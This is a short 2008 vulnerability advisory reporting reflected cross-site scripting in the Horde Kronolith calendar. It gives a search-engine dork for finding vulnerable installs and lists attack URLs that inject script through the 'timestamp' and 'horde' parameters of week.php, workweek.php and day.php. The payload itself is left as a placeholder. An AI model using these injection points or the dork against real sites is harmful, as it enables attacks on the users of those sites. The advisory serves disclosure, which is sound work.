+==========================================================================+
+      Horde & Kronolith Calendar Application  & XSS Vulnerabilities       +
+==========================================================================+


Author(s): Ivan Sanchez 

Product: Kronolith Calendar Application

Web: http://www.horde.org/kronolith/

Versions: Kronolith: Copyright 2000-2003

Date: 23/05/2008


Kronolith is the Horde calendar application.



GOOGLE DORKS:
------------

intext:"Kronolith: Copyright 2000-2003"




Evil Functions:  
---------------

week.php?
workweek.php?
day.php?
horde=



Internal Variables:
-------------------

timestamp=xss
horde=xss



Exploits:
----------

Insert evil code into these variables,then run the exploit !!!

http://site/horde2/kronolith/week.php?timestamp=< XSS EVIL REMOTE CODE >
http://site/horde2/kronolith/workweek.php?timestamp=< XSS EVIL REMOTE CODE >
http://site/horde/kronolith/day.php?timestamp=< XSS EVIL REMOTE CODE >
https://site/horde/kronolith/horde= < XSS EVIL REMOTE CODE >



Comming soon more xss !!!



   NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
+==========================================================================+
+         Horde & Kronolith Calendar Application  & XSS Vulnerabilities    +             +
+==========================================================================+